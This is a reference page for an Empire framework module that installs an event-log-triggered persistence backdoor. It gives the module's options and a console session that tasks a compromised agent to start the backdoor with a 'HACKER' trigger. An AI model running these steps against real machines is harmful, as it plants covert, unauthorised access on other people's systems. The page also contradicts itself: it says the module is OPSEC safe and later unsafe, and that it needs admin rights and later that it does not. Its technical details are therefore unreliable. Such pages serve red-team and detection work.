Invoke-EventLogBackdoor - Empire Module

This page contains detailed information about how to use the powershell/persistence/powerbreach/eventlog Empire module. For list of all Empire modules, visit the Empire Module Library.

Module Overview

---

Name: Invoke-EventLogBackdoor
Module: powershell/persistence/powerbreach/eventlog
Source code [1]: empire/server/modules/powershell/persistence/powerbreach/eventlog.yaml
Source code [2]: empire/server/modules/powershell/persistence/powerbreach/eventlog.py
MITRE ATT&CK: T1084
Language: PowerShell
Needs admin: Yes
OPSEC safe: Yes
Background: No

The eventlog module starts the event-loop backdoor.

This module runs in a foreground and is OPSEC unsafe as it writes on the disk and therefore could be detected by AV/EDR running on the target system.

Note that the eventlog module does not need administrative privileges to work properly which means that a normal user can run this module.

Required Module Options

---

This is a list of options that are required by the eventlog module:

Agent
Agent to run module on.

Listener
Listener to use.

Sleep
Time (in seconds) to sleep between checks.
Default value: 30.

Timeout
Time (in seconds) to run the backdoor. Defaults to 0 (run forever).

Trigger
The unique value to look for in every event packet.
Default value: HACKER.

Additional Module Options

---

This is a list of additional options that are supported by the eventlog module:

OutFile
Output the backdoor to a file instead of tasking to an agent.

Eventlog Example Usage

---

Here's an example of how to use the eventlog module in the Empire client console:

[+] New agent Y4LHEV83 checked in
[*] Sending agent (stage 2) to Y4LHEV83 at 192.168.204.135
(empire usestager/windows/ducky) > usemodule powershell/persistence/powerbreach/eventlog

 Author       @sixdub                                     
 Background   False                                       
 Comments     http://sixdub.net                           
 Description  Starts the event-loop backdoor.             
 Language     powershell                                  
 Name         powershell/persistence/powerbreach/eventlog 
 NeedsAdmin   True                                        
 OpsecSafe    True                                        
 Techniques   http://attack.mitre.org/techniques/T1084    


,Record Options-----,----------,------------------------------------,
| Name     | Value  | Required | Description                        |
|----------|--------|----------|------------------------------------|
| Agent    |        | True     | Agent to run module on.            |
|----------|--------|----------|------------------------------------|
| Listener |        | True     | Listener to use.                   |
|----------|--------|----------|------------------------------------|
| OutFile  |        | False    | Output the backdoor to a file      |
|          |        |          | instead of tasking to an agent.    |
|----------|--------|----------|------------------------------------|
| Sleep    | 30     | True     | Time (in seconds) to sleep between |
|          |        |          | checks.                            |
|----------|--------|----------|------------------------------------|
| Timeout  | 0      | True     | Time (in seconds) to run the       |
|          |        |          | backdoor. Defaults to 0 (run       |
|          |        |          | forever).                          |
|----------|--------|----------|------------------------------------|
| Trigger  | HACKER | True     | The unique value to look for in    |
|          |        |          | every event packet.                |
'----------'--------'----------'------------------------------------'

(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Agent Y4LHEV83
[*] Set Agent to Y4LHEV83
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Listener listener1
[*] Set Listener to listener1
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Sleep 30
[*] Set Sleep to 30
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Timeout 0
[*] Set Timeout to 0
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > set Trigger HACKER
[*] Set Trigger to HACKER
(Empire: usemodule/powershell/persistence/powerbreach/eventlog) > execute
[*] Tasked Y4LHEV83 to run Task 1
...

Now wait for the results to come.

Author

---

• @sixdub

References

---

• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/powerbreach/eventlog.yaml
• https://github.com/BC-SECURITY/Empire/tree/master/empire/server/modules/powershell/persistence/powerbreach/eventlog.py
• http://sixdub.net
• http://attack.mitre.org/techniques/T1084

See Also

---

Check also the following modules related to this module:

• powershell/persistence/powerbreach/deaduser
• powershell/persistence/powerbreach/resolver

Version

---

This page has been created based on Empire version 4.1.3 (BC Security Fork).
Visit Empire Module Library for more modules.